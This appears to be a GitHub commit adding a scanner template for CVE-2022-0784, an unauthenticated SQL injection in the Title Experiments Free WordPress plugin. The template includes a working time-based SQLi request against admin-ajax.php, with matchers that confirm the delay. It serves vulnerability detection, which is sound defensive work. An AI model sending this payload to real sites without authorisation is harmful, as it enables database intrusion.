Merge pull request #6450 from theamanrawat/CVE-2022-0784

Added template for CVE-2022-0784
patch-1
Dhiyaneshwaran 2023-01-04 13:06:08 +05:30 committed by GitHub
commit c90e9d39d0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: CVE-2022-0784
info:
name: Title Experiments Free < 9.0.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
classification:
cve-id: CVE-2022-0784
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-experiments-free,unauth
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and